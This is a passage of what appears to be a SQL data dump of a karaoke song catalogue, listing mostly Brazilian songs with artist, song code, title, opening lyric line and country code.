3167, 'NÃO ADIANTA CHORAR', 'Eu te levei a sério fiz tudo...', 'BRA'), (178, 'Leandro e Leonardo', 3168, 'NÃO APRENDI DIZER ADEUS', 'Não aprendi dizer adeus...', 'BRA'), (179, 'Alcione', 3169, 'NÃO DEIXE O SAMBA MORRER', 'Não deixe o samba morrer', 'BRA'), (180, 'Tim Maia', 3170, 'NÃO QUERO DINHEIRO SÓ QUERO AMAR', 'Vou pedir pra você voltar', 'BRA'), (181, 'Maria Bethânia', 3171, 'NEGUE', 'Negue seu amor o seu carinho', 'BRA'), (182, 'Chitãozinho e Xororó', 3172, 'NO RANCHO FUNDO', 'No Rancho Fundo bem pra lá do fim do', 'BRA'), (183, 'Zizi Possi', 3173, 'NOITE', 'Eu fico quieta num canto', 'BRA'), (184, 'Música Junina', 3174, 'NOITES DE JUNHO', 'Noite fria tão fria de junho', 'BRA'), (185, 'Ultraje a Rigor', 3175, 'NÓS VAMOS INVADIR SUA PRAIA', 'Daqui do morro dá pra ver tão legal', 'BRA'), (186, 'Banda Cheiro de Amor', 3176, 'NOSSA GENTE (AVISA LÁ)', 'Avisa lá que eu vou chegar mais tarde', 'BRA'), (187, 'Marina Lima', 3177, 'NOSSO ESTRANHO AMOR', 'Não quero sugar todo o seu leite', 'BRA'), (188, 'Só Pra Contrariar', 3178, 'NOSSO SONHO NÃO É ILUSÃO', 'Estão falando pra eu tomar cuidado', 'BRA'), (189, 'Fagner', 3179, 'NOTURNO', 'O aço dos meus olhos', 'BRA'), (190, 'Fagner', 3180, 'NUNCA', 'Nunca nem que o mundo caia', 'BRA'), (191, 'Chitãozinho e Xororó', 3181, 'NUVEM DE LÁGRIMAS', 'Há uma nuvem de lágrimas', 'BRA'), (192, 'Maysa', 3182, 'O BARQUINHO', 'Dia de luz festa do sol e o barquinho', 'BRA'), (193, 'Elis Regina', 3183, 'O BÊBADO E A EQUILIBRISTA', 'Caía a tarde feito um viaduto...', 'BRA'), (194, 'Dorival Caymmi', 3184, 'O BEM E O MAL', 'Eu guardo em mim dois ...', 'BRA'), (195, 'Ricardo Chaves', 3185, 'O BICHO', 'Quando o vento bater nos seus cabelos', 'BRA'), (196, 'Eduardo Araújo', 3186, 'O BOM', 'Meu carro é vermelho', 'BRA'), (197, 'Daniela Mercury', 3187, 'O CANTO DA CIDADE', 'A cor dessa cidade sou eu', 'BRA'), (198, 'Guilherme Arantes', 3188, 'O MELHOR VAI COMEÇAR', 'Eu quero o sol ao despertar...', 'BRA'), (199, 'Gonzaguinha', 3189, 'O QUE É O QUE É', 'Eu fico com a pureza da...', 'BRA'), (200, 'Grupo Pirraça', 3190, 'O QUE É QUE EU VOU FAZER', 'Eu não passo de um brinquedo...', 'BRA'), (201, 'Chico Buarque', 3191, 'O QUE SERÁ (A FLOR DA TERRA)', 'O que será que será', 'BRA'), (202, 'Lulu Santos', 3192, 'O ÚLTIMO ROMÂNTICO', 'Faltava abandonar a velha escola', 'BRA'), (203, 'Secos e Molhados', 3193, 'O VIRA', 'O gato preto cruzou a estrada', 'BRA'), (204, 'Djavan', 3194, 'OCEANO', 'Assim que o dia amanheceu lá no mar alto', 'BRA'), (205, 'Paralamas do Sucesso', 3195, 'ÓCULOS', 'Se as meninas do Leblon', 'BRA'), (206, 'Raça Negra', 3196, 'OI (ESTOU TE AMANDO)', 'É legal demais ter você pra mim', 'BRA'), (207, 'RPM', 3197, 'OLHAR 43', 'Seu corpo é o fruto proibido', 'BRA'), (208, 'Maria Creuza', 3198, 'ONDE ANDA VOCÊ', 'E por falar em saudade', 'BRA'), (209, 'Djavan', 3199, 'OUTONO', 'Um olhar uma luz', 'BRA'), (210, 'Roberto Carlos', 3200, 'OUTRA VEZ', 'Você foi o maior dos meus casos', 'BRA'), (211, 'Rita Lee', 3201, 'OVELHA NEGRA', 'Levava uma vida sossegada', 'BRA'), (212, 'Legião Urbana', 3202, 'PAIS E FILHOS', 'Estátuas e cofres e paredes...', 'BRA'), (213, 'Zezé Di Camargo e Luciano', 3203, 'PÃO DE MEL', 'Você é minha luz estrada meu caminho', 'BRA'), (214, 'Molejo', 3204, 'PAPARICO', 'Menina vou lhe ser sincero', 'BRA'), (215, 'Parabéns a Você', 3205, 'PARABÉNS A VOCÊ', 'Parabéns pra você nessa data querida', 'BRA'), (216, 'Wanderléa', 3206, 'PARE O CASAMENTO', 'Antes de continuar a cerimônia', 'BRA'), (217, 'Fábio Jr.', 3207, 'PAREÇO UM MENINO', 'Apenas você tem o dom de guiar meu de', 'BRA'), (218, 'Leandro e Leonardo', 3208, 'PAZ NA CAMA', 'Quando alguém lhe perguntar...', 'BRA'), (219, 'Música Junina', 3209, 'PEDRO, ANTÔNIO E JOÃO', 'Com a filha de João Antonio ia se casaar', 'BRA'), (220, 'Mamonas Assassinas', 3210, 'PELADOS EM SANTOS', 'Mina seus cabelo é da hora', 'BRA'), (221, 'Molejo', 3211, 'PENSAMENTO VERDE', 'Essa é a história de uma garota nova', 'BRA'), (222, 'Raça Negra', 3212, 'PENSANDO EM VOCÊ', 'Sempre que estou sozinho fico pensando', 'BRA'), (223, 'Emílio Santiago', 3213, 'PERFUME SIAMÊS', 'Mas que prazer te rever que bom te', 'BRA'), (224, 'Zizi Possi', 3214, 'PERIGO', 'Nem quero saber se o clima...', 'BRA'), (225, 'Djavan', 3215, 'PÉTALA', 'O seu amor...', 'BRA'), (226, 'Kid Abelha', 3216, 'PINTURA ÍNTIMA', 'Vem amor que a hora é essa...', 'BRA'), (227, 'Guilherme Arantes', 3217, 'PLANETA ÁGUA', 'Água que nasce na fonte...', 'BRA'), (228, 'Chitãozinho e Xororó', 3218, 'PLANETA AZUL', 'A vida e a natureza sempre à mercê', 'BRA'), (229, 'Leno e Lilian', 3219, 'POBRE MENINA', 'Pobre menina não tem...', 'BRA'), (230, 'Banda Brasil', 3220, 'PODEROSA', 'Pode ser que eu consiga esquecer mas eu', 'BRA'), (231, 'Marina Lima', 3221, 'PRA COMEÇAR', 'Pra começar quem vai colar os tais', 'BRA'), (232, 'Sandy e Júnior', 3222, 'PRA DANÇAR COM VOCÊ', 'No baile da escola eu espero você', 'BRA'), (233, 'Barão Vermelho', 3223, 'PRO DIA NASCER FELIZ', 'Todo o dia a insônia me convence que', 'BRA'), (234, 'Wanderléa', 3224, 'PROVA DE FOGO', 'Esta é uma prova de fogo', 'BRA'), (235, 'Música Junina', 3225, 'PULA A FOGUEIRA', 'Pula a fogueira iaiá', 'BRA'), (236, 'Patrícia Marx', 3226, 'QUANDO CHOVE', 'Quando olho nos teus olhos', 'BRA'), (237, 'Fábio Jr.', 3227, 'QUANDO GIRA O MUNDO', 'Tudo tudo pode acontecer', 'BRA'), (238, 'Legião Urbana', 3228, 'QUANDO O SOL BATER', 'Quando o sol bater na janela...', 'BRA'), (239, 'Legião Urbana', 3229, 'QUASE SEM QUERER', 'Tenho andado distraído...', 'BRA'), (240, 'Legião Urbana', 3230, 'QUE PAÍS É ESTE', 'Nas favelas no senado...', 'BRA'), (241, 'Raça Negra', 3231, 'QUE PENA', 'Que pena tudo acabar que pena você me', 'BRA'), (242, 'Só Pra Contrariar', 3232, 'QUE SE CHAMA AMOR', 'Como é que uma coisa assim machuca ta', 'BRA'), (243, 'Grupo Pirraça', 3233, 'QUEM DE NÓS', 'Quantas vezes eu te perguntei...', 'BRA'), (244, 'Simone', 3234, 'QUEM É VOCÊ', 'Quem será que me chega na toca da noite', 'BRA'), (245, 'Roberto Carlos', 3235, 'QUERO QUE VÁ TUDO PRO INFERNO', 'De que vale o céu azul e o sol', 'BRA'), (246, 'Olodum', 3236, 'REQUEBRA', 'Oh Requebra requebra requebra sim', 'BRA'), (247, 'Demétrius', 3237, 'O RITMO DA CHUVA', 'Olho para a chuva que não quer cessar', 'BRA'), (248, 'Mamonas Assassinas', 3238, 'ROBOCOP GAY', 'Um tanto quanto másculo', 'BRA'), (249, 'Juan Luis Guerra', 3239, 'ROMANCE ROSA', 'Eu te dei uma rosa que...', 'BRA'), (250, 'Elis Regina', 3240, 'ROMARIA', 'É de sonho e de pó o destino de um só', 'BRA'), (251, 'Maria Bethânia', 3241, 'RONDA', 'De noite eu rondo a cidade', 'BRA'), (252, 'Eduardo Araújo', 3242, 'RUA AUGUSTA', 'Entrei na Rua Augusta a cento e vinte', 'BRA'), (253, 'Mamonas Assassinas', 3243, 'SABÃO CRÁ-CRÁ', 'Sabão crá-crá', 'BRA'), (254, 'Emílio Santiago', 3244, 'SAIGON', 'Tantas palavras meias palavras', 'BRA'), (255, 'Demônios da Garoa', 3245, 'SAMBA DO "ARNESTO"', 'Paiz paiz paiz... O Arnesto nos convidô', 'BRA'), (256, 'Caetano Veloso', 3246, 'SAMPA', 'Alguma coisa acontece no meu coração', 'BRA'), (257, 'Cristina Monteiro', 3247, 'SANTA MADRUGADA', 'Talvez um dia a gente possa se encontrar', 'BRA'), (258, 'Hino do São Paulo', 3248, 'HINO DO SÃO PAULO', 'Salve o Tri-color paulista...', 'BRA'), (259, 'Augusto César', 3249, 'SAUDADE', 'Estou lendo a carta que você...', 'BRA'), (260, 'Zezé Di Camargo e Luciano', 3250, 'SAUDADE BANDIDA', 'Outra vez meu coração te procura', 'BRA'), (261, 'Demônios da Garoa', 3251, 'SAUDOSA MALOCA', 'Se o senhô não tá lembrado', 'BRA'), (262, 'Djavan', 3252, 'SE...', 'Você disse que não sabe se não', 'BRA'), (263, 'Roupa Nova', 3253, 'SEGUINDO NO TREM AZUL', 'Confessar sem medo de mentir', 'BRA'), (264, 'Legião Urbana', 3254, 'SERÁ', 'Tire suas mãos de mim...', 'BRA'), (265, 'Lulu Santos', 3255, 'SEREIA', 'Clara como a luz do sol', 'BRA'), (266, 'Pepeu Gomes', 3256, 'SEXY YEMANJÁ', 'A noite vai ter lua cheia', 'BRA'), (267, 'Djavan', 3257, 'SINA', 'Pai e mãe ouro de mina', 'BRA'), (268, 'Raça Negra', 3258, 'SÓ COM VOCÊ', 'Eu não quero mais fazer amor à toa', 'BRA'), (269, 'Nana Caymmi', 3259, 'SÓ LOUCO', 'Só louco amou como eu amei', 'BRA'), (270, 'Sá e Guarabyra', 3260, 'SOBRADINHO', 'O homem chega e já desfaz a natureza', 'BRA'), (271, 'Ivan Lins', 3261, 'SOMOS TODOS IGUAIS NESTA NOITE', 'Somos todos iguais nesta noite...', 'BRA'), (272, 'Leandro e Leonardo', 3262, 'SONHO POR SONHO', 'Nunca imaginei que você...', 'BRA'), (273, 'Alcione', 3263, 'SUFOCO', 'Não sei se vou aturar esses abusos não sei se', 'BRA'), (274, 'Emílio Santiago', 3264, 'TÁ TUDO ERRADO', 'Tá tudo errado entre nós o ...', 'BRA'), (275, 'Elson', 3265, 'TALISMÃ', 'Sabe quanto tempo eu não te vejo', 'BRA'), (276, 'Toquinho-Vinicius de Moraes', 3266, 'TARDE EM ITAPOÃ', 'Um velho calção de banho', 'BRA'), (277, 'Legião Urbana', 3267, 'TEMPO PERDIDO', 'Todos os dias quando acordo...', 'BRA'), (278, 'Biquini Cavadão', 3268, 'TIMIDEZ', 'Toda vez que te olho crio um romance', 'BRA'), (279, 'Xuxa', 3269, 'TINDOLELÊ', 'Todo mundo tá feliz tá feliz', 'BRA'), (280, 'Alcione', 3270, 'TÔ COM SAUDADE', 'Tô com saudade amor', 'BRA'), (281, 'Netinho', 3271, 'TOTAL', 'Total que me importa se duvidas', 'BRA'), (282, 'Milton Nascimento', 3272, 'TRAVESSIA', 'Quando você foi embora', 'BRA'), (283, 'Demônios da Garoa', 3273, 'TREM DAS ONZE', 'Pá zai zai... Não posso ficar nem mais', 'BRA'), (284, 'Guilherme Arantes', 3274, 'TRILHAS', 'Traços de nanquim não se...', 'BRA'), (285, 'Elis Regina', 3275, 'TRISTE', 'Triste é viver na solidão', 'BRA'), (286, 'Chico Buarque', 3276, 'TROCANDO EM MIÚDOS', 'Eu vou lhe deixar a medida do Bonfim', 'BRA'), (287, 'Alceu Valença', 3277, 'TROPICANA (MORENA TROPICANA)', 'Da manga rosa quero o gosto e o sumo', 'BRA'), (288, 'Lulu Santos', 3278, 'TUDO COM VOCÊ', 'Quero te conquistar um pouco mais e mais', 'BRA'), (289, 'Lulu Santos', 3279, 'UM CERTO ALGUÉM', 'Quis evitar seus olhos mas não pude resistir', 'BRA'), (290, 'Gal Costa', 3280, 'UM DIA DE DOMINGO', 'Eu preciso te falar te...', 'BRA'), (291, 'Paralamas do Sucesso', 3281, 'UMA BRASILEIRA', 'Rodas em sol trovas em do', 'BRA'), (292, 'Marina Lima', 3282, 'UMA NOITE E MEIA', 'Vem chegando o verão um calor no coração', 'BRA'), (293, 'Trem da Alegria', 3283, 'UNI, DUNI, TÊ', 'Eu quis saber da minha estrela guia', 'BRA'), (294, 'Taiguara', 3284, 'UNIVERSO NO TEU CORPO', 'Eu desisto não existe essa manhã', 'BRA'), (295, 'Art Popular', 3285, 'VALEU DEMAIS', 'Ai valeu demais valeu valeu demais', 'BRA'), (296, 'Erasmo Carlos', 3286, 'VEM QUENTE QUE EU ESTOU FERVENDO', 'Se você quer brigar ...', 'BRA'), (297, 'Biquini Cavadão', 3287, 'VENTO E VENTANIA', 'Vento e ventania me leve', 'BRA'), (298, 'Fábio Jr.', 3288, 'VINTE E POUCOS ANOS', 'Você já sabe me conhece', 'BRA'), (299, 'Mamonas Assassinas', 3289, 'VIRA VIRA', 'Fui convidado pra uma tal suruba', 'BRA'), (300, 'Ivan Lins', 3290, 'VITORIOSA', 'Quero sua risada mais gostosa...', 'BRA'), (301, 'Emílio Santiago', 3291, 'VOCÊ', 'Você manhã de todo meu você', 'BRA'), (302, 'Caetano Veloso', 3292, 'VOCÊ É LINDA', 'Fonte de mel nos olhos de gueixa', 'BRA'), (303, 'Blitz', 3293, 'VOCÊ NÃO SOUBE ME AMAR', 'Sabe essas noites que cê sai caminhando', 'BRA'), (304, 'Zezé Di Camargo e Luciano', 3294, 'VOCÊ VAI VER', 'Você pode encontrar muitos amores', 'BRA'), (305, 'Eliana de Lima', 3295, 'VOLTA PRA ELA', 'Quando você chegou em mim', 'BRA'), (306, 'Beth Carvalho', 3296, 'VOU FESTEJAR', 'Chora não vou ligar não vou ligar', 'BRA'), (307, 'Jorge Benjor', 3297, 'W BRASIL (CHAMA O SÍNDICO)', 'Alô alô W Brasil...Alô alô...', 'BRA'), (308, 'Tom Jobim', 3298, 'WAVE', 'Vou te contar', 'BRA'), (309, 'Blitz', 3299, 'WEEKEND', 'Alô alô ativo ouvinte', 'BRA'), (310, 'Roupa Nova', 3300, 'WHISKY A GO-GO', 'Foi numa festa gelo e cuba libre', 'BRA'), (311, 'Marina Lima', 3301, 'A FRANCESA', 'Meu amor se você for embora', 'BRA'), (312, 'Beth Carvalho', 3302, 'ANDANÇA', 'Vim tanta areia, andei', 'BRA'), (313, 'Chitãozinho e Xororó', 3303, 'ATÉ VOCÊ VOLTAR', 'Eu hoje perguntei para o meu coração', 'BRA'), (314, 'Mamonas Assassinas', 3304, 'BOIS DON''T CRY', 'Ser corno ou não ser', 'BRA'), (315, 'Super Feliz', 3305, 'BOLA PRA FRENTE', 'Vitória bola pra frente', 'BRA'), (316, 'Art Popular', 3306, 'BOM BOCADO', 'Ai ai ai... Oh oh oh... Como um bom bocado', 'BRA'), (317, 'Fagner', 3307, 'BORBULHAS DE AMOR (TENHO UM CORAÇÃO)', 'Tenho um coração dividido entre a', 'BRA'), (318, 'Sandra de Sá', 3308, 'BYE BYE TRISTEZA', 'Ninguém aqui é puro anjo ou demônio', 'BRA'), (319, 'Roberto Carlos', 3309, 'CAFÉ DA MANHÃ', 'Amanhã de manhã vou pedir um café', 'BRA'), (320, 'Léo Canhoto e Robertinho', 3310, 'CAIU O PALCO', 'Fui convidado pra cantar num baile', 'BRA'), (321, 'Leny Andrade', 3311, 'CHORA TUA TRISTEZA', 'Chora que a tristeza foge do teu olhar', 'BRA'), (322, 'Cazuza', 3312, 'CODINOME BEIJA FLOR', 'Pra que mentir fingir que perdoou tentar', 'BRA'), (323, 'Roupa Nova', 3313, 'COMEÇO, MEIO E FIM', 'A vida tem sons que pra gente ouvir', 'BRA'), (324, 'Roberto Carlos', 3314, 'COMO É GRANDE O MEU AMOR POR VOCÊ', 'Eu tenho tanto pra lhe falar mas com', 'BRA'), (325, 'Roberto Carlos', 3315, 'CORAÇÃO', 'Com o coração na voz e o grito mais', 'BRA'), (326, 'Zezé Di Camargo e Luciano', 3316, 'CORAÇÃO NA CONTRA MÃO', 'Te procurei pela casa dei de cara comigo', 'BRA'), (327, 'Sensação', 3317, 'CORAL DE ANJOS', 'Um coral de anjos cantou', 'BRA'), (328, 'Katinguelê', 3318, 'CORPO LÚCIDO', 'Como é difícil entender por...', 'BRA'), (329, 'Xuxa', 3319, 'DANÇA DA XUXA', 'Inventei uma dança nova', 'BRA'), (330, 'Elba Ramalho', 3320, 'DE VOLTA PRO ACONCHEGO', 'Estou de volta pro meu aconchego', 'BRA'), (331, 'Molejo', 3321, 'DOIDINHA POR MEU SAMBA', 'Alá lá le le... Doidinha por meu samba ''cê joga', 'BRA'), (332, 'Só Pra Contrariar', 3322, 'É BOM DEMAIS', 'Não larga do meu pé me chama de meu', 'BRA'), (333, 'Legião Urbana', 3323, 'EDUARDO E MÔNICA', 'Quem um dia irá dizer que...', 'BRA'), (334, 'Grupo Sampa', 3324, 'EU AMO VOCÊ', 'Os dias se passam não sou...', 'BRA'), (335, 'Grupo Sampa', 3325, 'FLAGRANTE', 'Lá se vão meus anéis vão com...', 'BRA'), (336, 'Chitãozinho e Xororó', 3326, 'FOGE DE MIM', 'Eu conto com você', 'BRA'), (337, 'Raul Seixas', 3327, 'GITA', 'Eu que já andei pelos quatro cantos do mundo', 'BRA'), (338, 'Djavan', 3328, 'LILÁS', 'Amanhã outro dia', 'BRA'), (339, 'Tom Jobim', 3329, 'LUÍZA', 'Rua espada nua', 'BRA'), (340, 'Jair Rodrigues', 3330, 'MAJESTADE O SABIÁ', 'Meus pensamentos tomam...', 'BRA'), (341, 'Roberta Miranda', 3331, 'MEU DENGO', 'Vem cá meu dengo ai ai ai ai ai', 'BRA'), (342, 'Martinho da Vila', 3332, 'MULHERES', 'Já tive mulheres de todas as cores', 'BRA'), (343, 'Daniela Mercury', 3333, 'MÚSICA DE RUA', 'Alegria agora agora e amanhã', 'BRA'), (344, 'Gal Costa', 3334, 'NADA MAIS', 'Sinto quando alguém te...', 'BRA'), (345, 'Leandro e Leonardo', 3335, 'NÃO OLHE ASSIM', 'Tire seus olhos dos meus...', 'BRA'), (346, 'Roberto Carlos', 3336, 'O PROGRESSO', 'Eu queria poder afagar', 'BRA'), (347, 'Cidade Negra', 3337, 'ONDE VOCÊ MORA?', 'Amor igual ao teu eu nunca mais terei', 'BRA'), (348, 'Roberto Carlos', 3338, 'OS SEUS BOTÕES', 'Os botões da blusa', 'BRA'), (349, 'Luiz Vieira', 3339, 'PAZ DO MEU AMOR', 'Você é isso uma beleza imensa', 'BRA'), (350, 'Mano a Mano', 3340, 'PEDINDO AMOR', 'Mais uma noite não pude te esquecer um só', 'BRA'), (351, 'Cristina Monteiro', 3341, 'PEDRA FALSA', 'Deixa de bobagem...', 'BRA'), (352, 'Xuxa', 3342, 'PIPOCA', 'Pipoca ah!', 'BRA'), (353, 'Só Pra Contrariar', 3343, 'PRIMEIRO AMOR', 'É na escola da vida que a gente apre', 'BRA'), (354, 'Roberta Miranda', 3344, 'SÃO TANTAS COISAS', 'São tantas coisas só nós sabemos', 'BRA'), (355, 'Daniela Mercury', 3345, 'SÓ PRA TE MOSTRAR', 'Não quero nada que não venha', 'BRA'), (356, 'Grupo Raça', 3346, 'TÔ LEGAL', 'Não faz mal se o sonho...', 'BRA'), (357, 'Katinguelê', 3347, 'UM DOCE SABOR', 'Como definir seu beijo uma...', 'BRA'), (358, 'Inimigos do Rei', 3348, 'UMA BARATA CHAMADA KAFKA', 'Encontrei uma barata na...', 'BRA'), (359, 'Art Popular', 3349, 'UTOPIA', 'Pra se dizer que a emoção', 'BRA'), (360, 'Daniela Mercury', 3350, 'VOCÊ NÃO ENTENDE NADA', 'Quando eu chego em casa', 'BRA'), (361, 'Engenheiros do Hawaí', 3351, 'A PROMESSA', 'Não vejo nada e o que eu vejo', 'BRA'), (362, 'Cidade Negra', 3352, 'A SOMBRA DA MALDADE', 'Eu sei que ela nunca mais apareceu', 'BRA'), (363, 'Fábio Jr.', 3353, 'AMARRADOS', 'Nós estamos amarrados um ao outro', 'BRA'), (364, 'Banda Bach', 3354, 'ATÉ DE MANHÃ', 'Amor aquilo foi demais pra mim', 'BRA'), (365, 'Daniela Mercury', 3355, 'BATUQUE', 'Tá no batuque que balança...', 'BRA'), (366, 'Zeca Pagodinho', 3356, 'CADA UM NO SEU CADA UM', 'Cada um na sua onda', 'BRA'), (367, 'Gal Costa', 3357, 'CHUVA DE PRATA', 'Se tem luar no céu...', 'BRA'), (368, 'Sampa Crew', 3358, 'CORAÇÃO TE ACALMA', 'Quantas vezes eu te disse coração', 'BRA'), (369, 'Banda Mel', 3359, 'CRENÇA E FÉ', 'Vou dar a volta no mundo', 'BRA'), (370, 'Roberta Miranda', 3360, 'DÓI', 'Dói sentir que o nosso amor', 'BRA'), (371, 'Fagner', 3361, 'ENDOIDECEU', 'Você endoideceu meu coração', 'BRA'), (372, 'João Paulo e Daniel', 3362, 'ESTOU APAIXONADO', 'Uh... la la iê ôh... Quero beber...', 'BRA'), (373, 'Fábio Jr.', 3363, 'EU NUNCA ESTIVE TÃO APAIXONADO', 'O que eu puder eu vou fazer', 'BRA'), (374, 'Cazuza', 3364, 'IDEOLOGIA', 'Meu partido é um coração partido', 'BRA'), (375, 'Cascatinha e Inhana', 3365, 'ÍNDIA', 'Índia seus cabelos nos ombros caindo', 'BRA'), (376, 'Simone', 3366, 'IOLANDA', 'Esta canção não é mais que mais uma', 'BRA'), (377, 'Xuxa', 3367, 'LUA DE CRISTAL', 'Tudo pode ser se quiser...', 'BRA'), (378, 'Carlos Oliva e Los Sobrinos', 3368, 'MACARENA', 'Dale a tu cuerpo alegria Macarena', 'ESP'), (379, 'Preto no Branco', 3369, 'MARAVILHOSA', 'Estou sabendo que o seu caso de amor', 'BRA'), (380, 'Sandy e Júnior', 3370, 'MARIA CHIQUINHA', 'Que cô cê foi fazê no mato Maria Chiquinha', 'BRA'), (381, 'Banda Eva', 3371, 'ME ABRAÇA', 'Quando você passa eu sinto o seu cheiro', 'BRA'), (382, 'Chiclete com Banana', 3372, 'ME PEGUE SE QUISER', 'Me pegue se quiser e leve se puder ôh', 'BRA'), (383, 'Só Pra Contrariar', 3373, 'MEU JEITO DE SER', 'Era só dizer pra mim...', 'BRA'), (384, 'Elza Soares', 3374, 'MULATA ASSANHADA', 'O mulata assanhada ...', 'BRA'), (385, 'Companhia do Pagode', 3375, 'NA BOQUINHA DA GARRAFA', 'No samba ela me diz que rala', 'BRA'), (386, 'Katinguelê', 3376, 'NO COMPASSO DO CRIADOR', 'Ao teu lado sou criança nosso...', 'BRA'), (387, 'Cazuza', 3377, 'O NOSSO AMOR A GENTE INVENTA', 'O teu amor é uma mentira', 'BRA'), (388, 'Fábio Jr.', 3378, 'O QUE É QUE HÁ', 'O que é que há?', 'BRA'), (389, 'Skank', 3379, 'PACATO CIDADÃO', 'Ôh pacato cidadão eu te chamei a atenção', 'BRA'), (390, 'Fábio Jr.', 3380, 'PAI', 'Pai, pode ser que daqui a algum tempo', 'BRA'), (391, 'Gera Samba', 3381, 'PAQUEREI', 'É o novo som de Salvador é o...', 'BRA'), (392, 'Simony-Alexandre', 3382, 'PELO MENOS UMA VEZ', 'Descansei a dor no azul do mar', 'BRA'), (393, 'Banda Mel', 3383, 'PREFIXO DE VERÃO', 'Aê aê...ei ei... Quando você chegar quando', 'BRA'), (394, 'Cidade Negra', 3384, 'QUEREM MEU SANGUE', 'Dizem que guardam bom lugar', 'BRA'), (395, 'Fernanda Abreu', 3385, 'BABILÔNIA ROCK', 'Ha ha ei ei... Rio Babilônia ou... Você vai cair', 'BRA'), (396, 'Zezé Di Camargo e Luciano', 3386, 'SALVA MEU CORAÇÃO', 'Sou louco pelo mel da sua boca', 'BRA'), (397, 'Zeca Pagodinho', 3387, 'SAMBA PRA MOÇAS', 'Incandiá incandiou eu vim pro samba', 'BRA'), (398, 'Eliana de Lima', 3388, 'SAUDADE DANADA', 'Como dói a solidão preciso ...', 'BRA'), (399, 'Ara Ketu', 3389, 'SEMPRE SERÁ', 'Gosto de ficar te olhando', 'BRA'), (400, 'Adryana Ribeiro-Luiz Carlos', 3390, 'SEMPRE SOU EU', 'É... mais uma vez estou chorando', 'BRA'), (401, 'Maria Bethânia', 3391, 'SONHO MEU', 'Sonho meu sonho meu', 'BRA'), (402, 'Só Pra Contrariar', 3392, 'TÃO SÓ', 'Eu fiquei sozinho mais uma noite sem', 'BRA'), (403, 'Skank', 3393, 'TE VER', 'Te ver e não te querer', 'BRA'), (404, 'Hanói Hanói', 3394, 'TOTALMENTE DEMAIS', 'Linda como um neném...', 'BRA'), (405, 'Chitãozinho e Xororó', 3395, 'UM HOMEM QUANDO AMA', 'Amigo, se você ama não tenha medo', 'BRA'), (406, 'Roberta Miranda', 3396, 'VÁ COM DEUS', 'A cada dia que se passa', 'BRA'), (407, 'Fernanda Abreu', 3397, 'VENENO DA LATA', 'Mil novecentos e noventa e ...', 'BRA'), (408, 'Sampa Crew', 3398, 'VERDADEIRA PAIXÃO', 'Eu vou além de mim sem nada temer', 'BRA'), (409, 'Um Toque a Mais', 3399, 'VIDA BANDIDA', 'Vida bandida que me traz tristeza', 'BRA'), (410, 'Muleke Travesso', 3400, 'VOCÊ EM MIM', 'Hoje eu me encontro na solidão', 'BRA'), (411, 'Engenheiros do Hawaí', 3401, 'A PERIGO', 'Planos de vôo Tava tudo em', 'BRA'), (412, 'Jorge Benjor', 3402, 'ALCOHOL', 'O Mago mandou avisar...', 'BRA'), (413, 'Roberto Carlos', 3403, 'AMIGO', 'Você meu amigo de fé meu irmão camarada', 'BRA'), (414, 'Gian e Giovani', 3404, 'AMOR DEMAIS', 'Deixa preparado nosso...', 'BRA'), (415, 'Roupa Nova', 3405, 'ANJO', 'Se você vê estrelas demais', 'BRA'), (416, 'Toquinho', 3406, 'AQUARELA', 'Numa folha qualquer eu desenho um sol', 'BRA'), (417, 'Beto Barbosa', 3407, 'EMBALO TRILEGAL', 'Eu vou mostrar pra você como se dança', 'BRA'), (418, 'Metrô', 3408, 'BEAT ACELERADO', 'Minha mãe me falou que eu preciso', 'BRA'), (419, 'Martinho da Vila', 3409, 'CANTA, CANTA MINHA GENTE', 'Canta, canta minha gente', 'BRA'), (420, 'Leandro e Leonardo', 3410, 'CASA SEPARA', 'Eu quero te amar sem...', 'BRA'), (421, 'Negritude Júnior', 3411, 'COHAB CITY-VEM PRA CÁ', 'Tô chegando na Cohab pra...', 'BRA'), (422, 'Banda Brasil', 3412, 'COMO DÓI', 'Se eu estou sofrendo é por...', 'BRA'), (423, 'Elba Ramalho', 3413, 'CORAÇÃO DA GENTE', 'Morena que dança num mar de alegria', 'BRA'), (424, 'Chitãozinho e Xororó', 3414, 'CORAÇÃO SERTANEJO', 'Andei, andei, andei, até encontrar', 'BRA'), (425, 'Gian e Giovani', 3415, 'DEPOIS DO ADEUS', 'O que é que eu vou fazer de...', 'BRA'), (426, 'Do Jeito Que Eu Gosto', 3416, 'DO JEITO QUE EU GOSTO', 'Lá laiá lá... Foi bom te encontrar', 'BRA'), (427, 'Tim Maia', 3417, 'DO LEME AO PONTAL', 'Do Leme ao pontal não há nada igual', 'BRA'), (428, 'Gian e Giovani', 3418, 'DÓI', 'Dói dói demais em mim eu te...', 'BRA'), (429, 'Beto Barbosa', 3419, 'DONA', 'É amor e prazer uma louca paixão', 'BRA'), (430, 'Leandro e Leonardo', 3420, 'ENTRE TAPAS E BEIJOS', 'Perguntaram pra mim se ainda...', 'BRA'), (431, 'Chrystian e Ralf', 3421, 'ESSE AMOR QUE ME MATA', 'Tô sozinho e você tão longe', 'BRA'), (432, 'Leandro e Leonardo', 3422, 'ESTA NOITE FOI MARAVILHOSA', 'A noite vem vindo estrelas...', 'BRA'), (433, 'Tiririca', 3423, 'EU SOU CHIFRUDO', 'Essa música eu quero oferecer para os', 'BRA'), (434, 'Sempre Livre', 3424, 'EU SOU FREE', 'Só estudei em escola experimental', 'BRA'), (435, 'Rádio Táxi', 3425, 'EVA', 'Meu amor olha só hoje o sol não apareceu', 'BRA'), (436, 'Ginga Pura', 3426, 'FRUTO DOS DEUSES', 'Você é meu favo de mel...', 'BRA'), (437, 'Hino do Palmeiras', 3427, 'HINO DO PALMEIRAS', 'Quando surge o alvi verde...', 'BRA'), (438, 'Só Pra Contrariar', 3428, 'LINDA', 'É uma coisa sem explicação', 'BRA'), (439, 'Angélica', 3429, 'MAGIA', 'Sol de verão queimando no meu corpo', 'BRA'), (440, 'Leandro e Leonardo', 3430, 'MAIS UMA NOITE SEM VOCÊ', 'Mais uma noite sem você...', 'BRA'), (441, 'Grafite', 3431, 'MAMMA MARIA', 'Fim de semana você me liga...', 'BRA'), (442, 'Elis Regina', 3432, 'ME DEIXAS LOUCA', 'Quando caminho pela rua lado à lado', 'BRA'), (443, 'Gian e Giovani', 3433, 'MEDO', 'Bandida solidão vou te...', 'BRA'), (444, 'Ritchie', 3434, 'MENINA VENENO', 'Meia noite no meu quarto', 'BRA'), (445, 'Gian e Giovani', 3435, 'NOSSA SENHORA DE APARECIDA', 'Eu tenho fé... Que dessa vez...', 'BRA'), (446, 'Nenhum de Nós', 3436, 'O ASTRONAUTA DE MÁRMORE', 'A lua inteira agora é um...', 'BRA'), (447, 'Zezé Di Camargo e Luciano', 